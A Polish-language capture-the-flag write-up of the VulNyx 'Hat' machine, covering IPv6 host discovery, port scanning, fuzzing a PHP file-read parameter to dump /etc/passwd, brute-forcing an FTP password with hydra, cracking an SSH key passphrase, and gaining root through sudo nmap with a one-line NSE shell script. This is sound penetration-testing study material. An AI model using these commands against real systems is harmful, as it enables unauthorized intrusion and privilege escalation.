Hat by D4t4s3c
Write-up is in Polish language.
00. Metainfo
| Nazwa: | Hat |
| Autor: | D4t4s3c |
| Wypuszczony: | 2021-09-30 |
| Do ściągnięcia: | vulnyx |
| Poziom: | Średni |
| System: | Linux |
| Nauczysz się: | IPv6, Kryptografia, Fuzzing, Gtfobins |
01. Wstęp
Hat jest podstępną, za to świetną maszyną, na którą można stracić dużo czasu. Ale jak mówił Sherlock Holmes. “Gdy odrzucisz to, co niemożliwe, wszystko pozostałe, choćby najbardziej nieprawdopodobne, musi być prawdą.” Te powiedzenie sprawdza się i tutaj. A o co chodzi? Nie będę was trzymał w niepewności. Tak, chodzi o IPv6. Ile czasu straciłem na to, żeby to rozwiązać. Nauczyłem się przy okazji dużo nowych rzeczy, chociaż i tak sam tego nie rozwiązałem. Za to dzięki solucji Nepcodex wszystko stało się jasne.
02. Ustalanie IP maszyny
Najpierw sprawdźmy IP maszyny, jaką ma w IPv4. Zapiszmy też sobie adres fizyczny, czyli potocznie adres MAC. to będzie ważne przy ustalaniu adresu IPv6 atakowanej wirtualki:
# netdiscover -i eth0 -r 172.16.1.0/24
...
172.16.1.166 f2:73:39:62:4e:7e 1 42 Unknown vendor
...
Mamy IPv4 i adres MAC, teraz ustalmy jak to wygląda w IPv6. Najpierw sprawdźmy nasz adres IPv6:
# root@kali:/home/szikers# ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether b2:46:e6:c8:fb:59 brd ff:ff:ff:ff:ff:ff
inet 172.16.1.10/24 brd 172.16.1.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fda4:6a57:e20b:0:b046:e6ff:fec8:fb59/64 scope global dynamic mngtmpaddr
valid_lft forever preferred_lft forever
inet6 fe80::b046:e6ff:fec8:fb59/64 scope link
valid_lft forever preferred_lft forever
W IPv6 prefiks zaczynający się od fe80 oznacza sieć lokalną. Zauważmy, że trzy ostatnie bajty naszej karty sieciowej są tożsame z ostatnimi bajtami IPv6. Dzięki tej obserwacji zazwyczaj można znaleźć konkretny komputer, który znajduje się w sieci. Jak nie, to trzeba dalej analizować adres MAC, (ale nie będę już tego opisywał) Na lokalnym komputerze wykonajmy poniższą komendę:
# root@kali:/home/szikers# ping6 ff02::1 | grep 62:4e7e
64 bytes from fe80::f073:39ff:fe62:4e7e%eth0: icmp_seq=1 ttl=64 time=0.873 ms
64 bytes from fe80::f073:39ff:fe62:4e7e%eth0: icmp_seq=2 ttl=64 time=0.451 ms
To jest właśnie nasza poszukiwana maszyna. Spingujmy ją; można komendą ping lub ping6.
# root@kali:/home/szikers# ping6 fe80::f073:39ff:fe62:4e7e%eth0
PING fe80::f073:39ff:fe62:4e7e%eth0(fe80::f073:39ff:fe62:4e7e%eth0) 56 data bytes
64 bytes from fe80::f073:39ff:fe62:4e7e%eth0: icmp_seq=1 ttl=64 time=0.361 ms
64 bytes from fe80::f073:39ff:fe62:4e7e%eth0: icmp_seq=2 ttl=64 time=0.414 ms
03. Enumeracja portów
Tak wygląda skanowanie IPv6:
msf6 > db_nmap -6 fe80::f073:39ff:fe62:4e7e%eth0
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-08 20:08 CEST
[*] Nmap: Nmap scan report for fe80::f073:39ff:fe62:4e7e
[*] Nmap: Host is up (0.00036s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: 80/tcp open http
[*] Nmap: MAC Address: F2:73:39:62:4E:7E (Unknown)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Ale po co do tego używać IPv6? Przecież IPv4 jest łatwiejsze i prostsze w obsłudze - zapytacie. Zaraz wyjaśnię, ale wpierw zeskanuję Nmapem zwykłe IPv4.
msf6 > db_nmap -A -p- 172.16.1.166
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-08 22:12 CEST
[*] Nmap: Nmap scan report for Hat.lan (172.16.1.166)
[*] Nmap: Host is up (0.00042s latency).
[*] Nmap: Not shown: 65532 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp filtered ssh
[*] Nmap: 80/tcp open http Apache httpd 2.4.38 ((Debian))
[*] Nmap: |_http-server-header: Apache/2.4.38 (Debian)
[*] Nmap: |_http-title: Apache2 Debian Default Page: It works
[*] Nmap: 65535/tcp open ftp pyftpdlib 1.5.4
[*] Nmap: | ftp-syst:
[*] Nmap: | STAT:
[*] Nmap: | FTP server status:
[*] Nmap: | Connected to: 172.16.1.166:65535
[*] Nmap: | Waiting for username.
[*] Nmap: | TYPE: ASCII; STRUcture: File; MODE: Stream
[*] Nmap: | Data connection closed.
[*] Nmap: |_End of status.
[*] Nmap: MAC Address: F2:73:39:62:4E:7E (Unknown)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 4.X|5.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
[*] Nmap: OS details: Linux 4.15 - 5.6
[*] Nmap: Network Distance: 1 hop
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.42 ms Hat.lan (172.16.1.166)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.05 seconds
msf6 >
Jak widzicie port 22 jest filtrowany. Na początku myślałem, że Knockd go blokował, ale to nie było to. To podstępny IPv6 
Dochodzi nam jeszcze port 65535, na którym jest jakiś FTP.
04. WWW i [fe80::f073:39ff:fe62:4e7e]
Port 80 też jest otwarty, wejdźmy na stronę poprzez IPv6 wpisując http://[fe80::f073:39ff:fe62:4e7e]
jak widzimy, jest to zwykła strona Debiana. Chciałem poffuzować trochę w IPv6. Myślałem, że Feroxbuster to wspiera. Jednak na razie to nie działa. Skanowałem standardowo IPv4.
05. Feroxbuster i FFuf
Poszukajmy ukrytych plików:
# root@kali:/home/szikers/dc-6# feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://172.16.1.166 -x php log
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://172.16.1.166
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [php, log]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 311c http://172.16.1.166/logs
301 9l 28w 318c http://172.16.1.166/php-scripts
200 0l 0w 0c http://172.16.1.166/php-scripts/file.php
200 26l 198w 1834c http://172.16.1.166/logs/vsftpd.log
403 9l 28w 277c http://172.16.1.166/server-status
[####################] - 4m 1868652/1868652 0s found:5 errors:0
[####################] - 4m 622884/622884 2539/s http://172.16.1.166
[####################] - 4m 622884/622884 2497/s http://172.16.1.166/logs
[####################] - 3m 622884/622884 2636/s http://172.16.1.166/php-scripts
Użyłem tutaj do wyszukiwania rozszerzeń .php i .log, bo już wcześniej wiedziałem czego mam szukać. http://172.16.1.166/php-scripts/file.php sugeruje nam parametr do file. Teraz poffuzujmy Ffufem.
# root@kali:/# ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.16.1.166/php-scripts/file.php?FUZZ=/etc/passwd -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://172.16.1.166/php-scripts/file.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 0
________________________________________________
6 [Status: 200, Size: 1452, Words: 13, Lines: 28]
:: Progress: [4686/4686] :: Job [1/1] :: 60 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
Parametrem do file jest 6. Skoro już to wiemy, to możemy podejrzeć zawartość /etc/passwd:
http://172.16.1.166/php-scripts/file.php?6=/etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534: :/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
Widać użytkownika cromiphi. Ta informacja się nam potem przyda. Za to vsftpd.log zawiera:
http://172.16.1.166/logs/vsftpd.log
[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<< [I 2021-09-28 18:43:57] concurrency model: async [I 2021-09-28 18:43:57] masquerade (NAT) address: None [I 2021-09-28 18:43:57] passive ports: None [I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect) [I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49272-[] USER 'noname' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49278-[] USER 'cromiphi' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49284-[] USER 'b4el7d' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'shelldredd' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'anonymous' failed login. [I 2021-09-28 18:44:06] 192.168.1.83:49296-[] USER 'sml' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49280-[] USER 'k1m3r4' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49284-[] USER 'tatayoyo' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49278-[] USER 'Exploiter' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49268-[] USER 'tasiyanci' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49274-[] USER 'luken' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49270-[] USER 'ch4rm' failed login. [I 2021-09-28 18:44:09] 192.168.1.83:49282-[] FTP session closed (disconnect). [I 2021-09-28 18:44:09] 192.168.1.83:49280-[ftp_s3cr3t] USER 'ftp_s3cr3t' logged in. [I 2021-09-28 18:44:09] 192.168.1.83:49280-[ftp_s3cr3t] FTP session closed (disconnect). [I 2021-09-28 18:44:12] 192.168.1.83:49272-[] FTP session closed (disconnect).
06. Pyftpdlib
ftp_s3cr3t jest loginem na FTP na 65535 porcie. Najpierw myślałem, że Pyftpdlib jest podatny na włamanie, jednak nie. Do uzyskania hasła niestety trzeba użyć metody siłowej.
# hydra -t64 -T64 -s 65535 -V -P /usr/share/wordlists/rockyou.txt -l ftp_s3cr3t ftp://172.16.1.166
ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "chinita" - 1071 of 14344399 [child 46] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "alexandru" - 1072 of 14344399 [child 47] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "mihaela" - 1073 of 14344399 [child 48] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "trisha" - 1074 of 14344399 [child 49] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "mitchell" - 1075 of 14344399 [child 50] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "love4ever" - 1076 of 14344399 [child 51] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "1234" - 1077 of 14344399 [child 52] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "shane" - 1078 of 14344399 [child 53] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "bulldog" - 1079 of 14344399 [child 54] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "brownie" - 1080 of 14344399 [child 55] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "thuglife" - 1081 of 14344399 [child 56] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "amormio" - 1082 of 14344399 [child 57] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "margaret" - 1083 of 14344399 [child 58] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "calvin" - 1084 of 14344399 [child 59] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "aquarius" - 1085 of 14344399 [child 60] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "phillip" - 1086 of 14344399 [child 61] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "kitty1" - 1087 of 14344399 [child 62] (0/0)
[ATTEMPT] target 172.16.1.166 - login "ftp_s3cr3t" - pass "morena" - 1088 of 14344399 [child 63] (0/0)
[65535][ftp] host: 172.16.1.166 login: ftp_s3cr3t password: cowboy
v1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-30 21:51:35
Hydra znalazł nam hasło: cowboy. Wchodzimy na FTP i ściągamy klucz:
# root@kali:~# ncftp
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
ncftp> open -u ftp_s3cr3t -P 65535 172.16.1.166
Connecting to 172.16.1.166...
pyftpdlib 1.5.4 ready.
Logging in...
Password requested by 172.16.1.166 for user "ftp_s3cr3t".
Username ok, send password.
Password: ******
Login successful.
Logged in to 172.16.1.166.
ncftp / > ls
ftp_s3cret_share/
ncftp / > cd ftp_s3cret_share/
ncftp /ftp_s3cret_share > ls
id_rsa note
ncftp /ftp_s3cret_share > cat note
Hi,
We have successfully secured some of our most critical protocols ... no more worrying!
Sysadmin
ncftp /ftp_s3cret_share > get id_rsa
id_rsa: 1.71 kB 90.32 kB/s
ncftp /ftp_s3cret_share >
id_rsa jest zakodowany. Użyjmy komendy ssh2john i hashcat.exe (Windows), żeby go rozkodować:
# ssh2john.py id_rsa > id_rsa.dec
c:\temp\hashcat-6.2.3>hashcat.exe -O -m22911 -a0 crack\id_rsa.dec rockyou.txt --show
$sshng$0$8$6f30b7b22b088ab2$1200$2662c9a88e26f6393531cac8ccd172b98acfc8fbb7667c3a6b0bb21082b465cb6061a6e3364e4c542334147e394900a5aea2b742a4800a23aae3e0e7316ac40a3e423be24fcc68c8ba9833f08ad6d02afb9a445235af5f09e101ac8cc08bddb818433bd8f32ec2504ce3358367ff7ada0b59a439f35d82dcf6661d5537beb9b23636b542e9dd9a9352f918cb01758c220558fc6e19d4b2be1da178b565c4406681d4b1eb3f67ca217cd5e45280ced9dd64426884d210151149c17abcd5f84f381a92450601e985ba06f44f91dc6876eef88cde9634a85bd4fcf59b4c9f18e8b8128093cc2e576512e044ca6d0b3c3a5cdbb2fbc1d2846300a33d6046b6e1a72ac75f95e41fb322a28c7f3f603947d21b2b0dcf3764c703475de3b5f65b6631d923055d854b8a747a7a220e259b18b546a240df9083e991c733338a966d538d0b240348fa8dd3de277a3979b87fcf7a1eb6bdc52846b0cfed8a41af825fe7eb0b037facb15473c30ebe1ec8e3f8c9f68da474a074bb93871fea605df9a14c9ce59954aa3adb62edcc5e7d46f5e36265b64bb990497029dbd5107c3eaa664d330af0f8abfbae5a6f7b37ec5b8bb39bc25e9e59b15e8325eb667714a3e329aac4a99adb3ba6c77fa956008ac98091b27519f5b690ff218d432592b06b468bae46ebee1bbc0b42d2a4855dcb965449a4f4e192ff141c43411edc836fd9605e4a735a6f2208d7ae512c6db48f0f28366cb2167823119debefb134bc979e6a52f43618eef790731c59f900b2f51aa232e24b15c64dc77e80f7fa9178b04dbcf6c1b4d128fcc3c0a6939fbe325bef6373cf3ee83f02753e8eacdfb678ff0ad2e91d37032a55cf8c6a0d1338e0b0abe4157cac1f3bb03edfed77c63532d7f4ca4482435ee84bf3c443af303b538bb2f590d812ae73d8755cdda82a9c73013f89369f4284bb662808d3a9e764386292a85e8cf93a3c3c0ae50884daa88a587fd23fa091d8083b98cc004053ee9e8cfdf9e17c7a5e54d0a299225f4e32c2538f537b3d077830c2b84e281bfbd286333479b64730c59363cbd539a473e0ab5cc7ddfc2699e3fe3f59d0d1001142362126461832d2fced1f87237d96c97552b636c91dcd9d781b5f76248d62c33380bc9964827a3a655e159251896df17f376ad9547d3727f7b41519e257be5261054ad812db131e30dcda5b07dca40d62da5c9108b3a5cc966b126321e5a123e7aa588570b174f1288da121ae97b9876350fedcbac0da77ea54a3563b874c13c0b3f5298b645eb9b7b04bc1f17da65fab4707ed623baed42a315d67b4e2d50d9763acc209b3a5dd2e5bdb830500500d0d8824af542d810aac8feb52aeb775c8e9f801e33a49dc8b755c4a401636b34fbd76f2e66892c7f4e39d5741b823859c32eba6e3458ccd7adf7c100c221ec697494458f3ab3ed3b1ad023efa4025cb33532b5a314af75cfdfdf44ce0788461fcc94dc42b3461fd04da7c791c28ff55ed8d312b0ae0db22ee5ac152b784271546446d5fb00eada2f4daafae260ec526b6a9aacf3f4e05559469e7161d48659d32e3c54c401a33eebbc11df7cf39582af9c4984f424479c0a95a6a1c5b8d9a0603f92dca8735b75f5037ce57e559a708074ea9fdc5c2af7c3a5cda9ad32d93b0d9ae4f6211e895fe42beaeb0d5784162ff272cb2e1d135a011ba:ilovemyself
Hasłem do klucza jest ilovemyself. Usuńmy je i nadajmy odpowiednie uprawnienia dla id_rsa.out:
# openssl rsa -in id_rsa -out id_rsa.out
# chown 600 id_rsa.out
07. SSH IPv6
Klucz usunęliśmy po to, żeby nie wpisywać hasła przy logowaniu. Teraz możemy od razu wejść na Shella. Pamiętajcie, żeby na końcu adresu IPv6 była dopisana sieciówka. W moim wypadku to jest %eth0.
# root@kali:/home/szikers/hat# ssh -i id_rsa.out -6 cromiphi@fe80::f073:39ff:fe62:4e7e%eth0
Linux Hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
cromiphi@Hat:~$
08. root
Konto root to jest już drobnostka, akurat ostatnio w DC-6 było identyczne rozwiązanie. Jak uzyskać większy dostęp przez Sudo na różne programy możesz zobaczyć na gtfobins. Niestety, po wejściu na roota nie widać co piszemy.
# cromiphi@Hat:~$ sudo -l
Matching Defaults entries for cromiphi on Hat:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cromiphi may run the following commands on Hat:
(root) NOPASSWD: /usr/bin/nmap
# cromiphi@Hat:~$ echo "os.execute('/bin/sh')">/tmp/root.nse
# cromiphi@Hat:~$ sudo nmap --script=/tmp/root.nse
Starting Nmap 7.70 ( https://nmap.org ) at 2021-10-08 23:50 CEST
# root@Hat:/home/cromiphi# uid=0(root) gid=0(root) grupos=0(root)
09. Koniec
Z tą wirtualką miałem dosyć dużo problemów (IPv6), ale człowiek się cały czas uczy. Jeżeli podobał się wpis, znalazłeś jakiś błąd napisz mejla na kerszi@protonmail.com.
Zostaw komentarz